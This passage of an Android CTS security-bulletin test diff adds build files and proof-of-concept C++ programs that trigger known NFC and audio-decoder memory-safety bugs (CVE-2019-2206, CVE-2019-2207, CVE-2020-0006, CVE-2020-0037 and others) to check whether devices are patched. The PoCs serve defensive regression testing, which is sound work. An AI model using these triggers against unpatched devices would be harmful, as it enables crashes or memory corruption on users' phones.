+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ "libchrome",
+ "libbase",
+ "liblog",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp
new file mode 100644
index 0000000..f40a7f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp
@@ -0,0 +1,123 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <stdlib.h>
+#include <tags_defs.h>
+
+#define RWLENGTH 32
+#define PLENGTH 1
+#define OFFSET 7
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void GKI_freebuf(void *p_buf __attribute__((unused))) {}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data =
+ (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2);
+
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_SET_READ_ONLY;
+ p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
+ p_i93->block_size = 1;
+
+ p_i93->ndef_tlv_start_offset = 0;
+ p_i93->rw_length = RWLENGTH;
+ p_i93->ndef_length = p_i93->rw_length * 2;
+
+ p_data->status = NFC_STATUS_OK;
+ NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
+ p_resp->len = PLENGTH;
+ p_resp->offset = OFFSET;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp
new file mode 100644
index 0000000..1147564
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2207",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp
new file mode 100644
index 0000000..f94ee94
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "nfa_hci_defs.h"
+#include "nfa_hci_int.h"
+#define SIZE 16
+
+extern tNFA_HCI_CB nfa_hci_cb;
+
+int main() {
+ nfa_hci_cb.cmd_sent = NFA_HCI_ANY_GET_PARAMETER;
+ nfa_hci_cb.param_in_use = NFA_HCI_HOST_LIST_INDEX;
+ uint8_t data_len = SIZE * 6;
+ uint8_t *data = (uint8_t *)malloc(SIZE);
+ if (!data) {
+ return EXIT_FAILURE;
+ }
+ nfa_hci_handle_admin_gate_rsp(data, data_len);
+ free(data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
index f388f89..720a76d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
@@ -20,135 +20,60 @@
#define MAX_PARAMETER_SETS (9)
#define MAX_NUM_OTT (5)
-
-#define RETURN_EXIT_FAILURE_IF_NULL(ptr) \
- { \
- if (!ptr) { \
- return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_FAILURE); \
- } \
- }
+#define ARR_SIZE (16)
typedef signed char SCHAR;
-int freeAllocatedMemoryAndReturn(SPATIAL_BS_FRAME *frame, spatialDec *decoder,
- int errorCode) {
- if (frame) {
- if (frame->CLDLosslessData) {
- for (int i = 0; i < MAX_NUM_OTT; ++i) {
- if ((&frame->CLDLosslessData[i])->state) {
- free((&frame->CLDLosslessData[i])->state);
- (&frame->CLDLosslessData[i])->state = nullptr;
- }
- }
- free(frame->CLDLosslessData);
- frame->CLDLosslessData = nullptr;
- }
- if (frame->ICCLosslessData) {
- free(frame->ICCLosslessData);
- frame->ICCLosslessData = nullptr;
- }
- if (frame->IPDLosslessData) {
- free(frame->IPDLosslessData);
- frame->IPDLosslessData = nullptr;
- }
- free(frame);
- frame = nullptr;
- }
-
- if (decoder) {
- if (decoder->pConfigCurrent) {
- free(decoder->pConfigCurrent);
- decoder->pConfigCurrent = nullptr;
- }
- if (decoder->ottCLDidxPrev) {
- free(decoder->ottCLDidxPrev);
- decoder->ottCLDidxPrev = nullptr;
- }
- if (decoder->smgTime) {
- free(decoder->smgTime);
- decoder->smgTime = nullptr;
- }
- if (decoder->smgData) {
- free(decoder->smgData);
- decoder->smgData = nullptr;
- }
- if (decoder->smoothState) {
- free(decoder->smoothState);
- decoder->smoothState = nullptr;
- }
- free(decoder);
- decoder = nullptr;
- }
- return errorCode;
-}
-
int main() {
- spatialDec *decoder = (spatialDec *)malloc(sizeof(spatialDec));
- if (!decoder) {
- return EXIT_FAILURE;
- }
- SPATIAL_BS_FRAME *frame =
- (SPATIAL_BS_FRAME *)malloc(sizeof(SPATIAL_BS_FRAME));
+ spatialDec decoder;
+ memset(&decoder, 0x0, sizeof(spatialDec));
- RETURN_EXIT_FAILURE_IF_NULL(frame);
- memset(frame, 0x00, sizeof(SPATIAL_BS_FRAME));
+ decoder.numOttBoxes = MAX_NUM_OTT;
- RETURN_EXIT_FAILURE_IF_NULL(decoder);
- memset(decoder, 0x00, sizeof(spatialDec));
+ SPATIAL_SPECIFIC_CONFIG pConfigCurrent;
+ memset(&pConfigCurrent, 0x0, sizeof(SPATIAL_SPECIFIC_CONFIG));
+ decoder.pConfigCurrent = &pConfigCurrent;
- size_t allocSize = sizeof(LOSSLESSDATA) * MAX_NUM_OTT * MAX_NUM_PARAMETERS;
+ SCHAR ottCLDidxPrev[ARR_SIZE] = {};
+ decoder.ottCLDidxPrev = (SCHAR **)&ottCLDidxPrev;
- frame->CLDLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->CLDLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ int smgTime = 1;
+ decoder.smgTime = &smgTime;
- frame->ICCLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->ICCLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ UCHAR smgData[ARR_SIZE] = {};
+ decoder.smgData = (UCHAR **)&smgData;
- frame->IPDLosslessData = (LOSSLESSDATA *)malloc(allocSize);
- RETURN_EXIT_FAILURE_IF_NULL(frame->IPDLosslessData);
- memset(frame->CLDLosslessData, 0x00, allocSize);
+ SMOOTHING_STATE smoothState;
+ memset(&smoothState, 0x0, sizeof(SMOOTHING_STATE));
+ decoder.smoothState = &smoothState;
- frame->numParameterSets = MAX_PARAMETER_SETS;
+ decoder.arbitraryDownmix = 0;
+ (decoder.concealInfo).concealState = SpatialDecConcealState_Ok;
+
+ const size_t allocSize = MAX_NUM_OTT * MAX_NUM_PARAMETERS;
+
+ SPATIAL_BS_FRAME frame;
+ memset(&frame, 0x0, sizeof(SPATIAL_BS_FRAME));
+
+ frame.numParameterSets = MAX_PARAMETER_SETS;
+
+ LOSSLESSDATA CLDLosslessData[allocSize] = {};
+ frame.CLDLosslessData = CLDLosslessData;
+
+ LOSSLESSDATA ICCLosslessData[allocSize] = {};
+ frame.ICCLosslessData = ICCLosslessData;
+
+ LOSSLESSDATA IPDLosslessData[allocSize] = {};
+ frame.IPDLosslessData = IPDLosslessData;
for (int i = 0; i < MAX_NUM_OTT; ++i) {
- (&frame->CLDLosslessData[i])->state = nullptr;
for (int j = 0; j < MAX_PARAMETER_SETS; ++j) {
- (&frame->CLDLosslessData[i])->bsXXXDataMode[j] = 2;
+ (frame.CLDLosslessData[i]).bsXXXDataMode[j] = 2;
}
- (&frame->CLDLosslessData[i])->state =
- (LOSSLESSSTATE *)malloc(sizeof(LOSSLESSSTATE));
- RETURN_EXIT_FAILURE_IF_NULL((&frame->CLDLosslessData[i])->state);
- memset((&frame->CLDLosslessData[i])->state, 0x00, sizeof(LOSSLESSSTATE));
+ LOSSLESSSTATE lossLessState;
+ (frame.CLDLosslessData[i]).state = &lossLessState;
}
- decoder->numOttBoxes = MAX_NUM_OTT;
-
- decoder->pConfigCurrent =
- (SPATIAL_SPECIFIC_CONFIG *)malloc(sizeof(SPATIAL_SPECIFIC_CONFIG));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->pConfigCurrent);
- memset(decoder->pConfigCurrent, 0x00, sizeof(SPATIAL_SPECIFIC_CONFIG));
-
- decoder->ottCLDidxPrev = (SCHAR **)malloc(sizeof(SCHAR *));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->ottCLDidxPrev);
- memset(decoder->ottCLDidxPrev, 0x00, sizeof(SCHAR *));
-
- decoder->smgTime = (int *)malloc(sizeof(int));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smgTime);
- memset(decoder->smgTime, 0x00, sizeof(int));
-
- decoder->smgData = (UCHAR **)malloc(sizeof(UCHAR *));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smgData);
- memset(decoder->smgData, 0x00, sizeof(UCHAR *));
-
- decoder->smoothState = (SMOOTHING_STATE *)malloc(sizeof(SMOOTHING_STATE));
- RETURN_EXIT_FAILURE_IF_NULL(decoder->smoothState);
- memset(decoder->smoothState, 0x00, sizeof(SMOOTHING_STATE));
-
- decoder->arbitraryDownmix = 0;
- (decoder->concealInfo).concealState = SpatialDecConcealState_Ok;
-
- SpatialDecDecodeFrame(decoder, frame);
- return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_SUCCESS);
+ SpatialDecDecodeFrame(&decoder, &frame);
+ return EXIT_SUCCESS;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp
new file mode 100644
index 0000000..dbb07bc
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0006",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
new file mode 100644
index 0000000..e90150e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+// borrowed from rw_i93.cc
+#define RW_I93_FORMAT_DATA_LEN 8
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+void* vulnerable_ptr;
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void* GKI_getbuf(uint16_t size) {
+ void* ptr = malloc(size);
+ if (size == RW_I93_FORMAT_DATA_LEN) {
+ vulnerable_ptr = ptr;
+ }
+ return ptr;
+}
+
+void GKI_freebuf(void* p_buf) {
+ if (p_buf == vulnerable_ptr) {
+ free(p_buf);
+ }
+}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_FORMAT;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_data->status = NFC_STATUS_OK;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp
new file mode 100644
index 0000000..d6adf3c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0037",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp
new file mode 100644
index 0000000..766ee03
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+ real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+ if (!real_GKI_getbuf) {
+ return;
+ }
+
+ real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+ if (!kIsInitialized) {
+ init();
+ }
+ return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ free(ptr);
+}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ p_i93->state = RW_I93_STATE_SET_READ_ONLY;
+ p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
+ p_i93->block_size = 255;
+
+ enable_selective_overload = ENABLE_ALL;
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_NONE;
+
+ (p_data->data.p_data)->len = 10;
+ p_data->data.p_data->offset = 0;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data);
+ free(nfc_cb.quick_timer_queue.p_first);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp
new file mode 100644
index 0000000..195d430
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0038",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
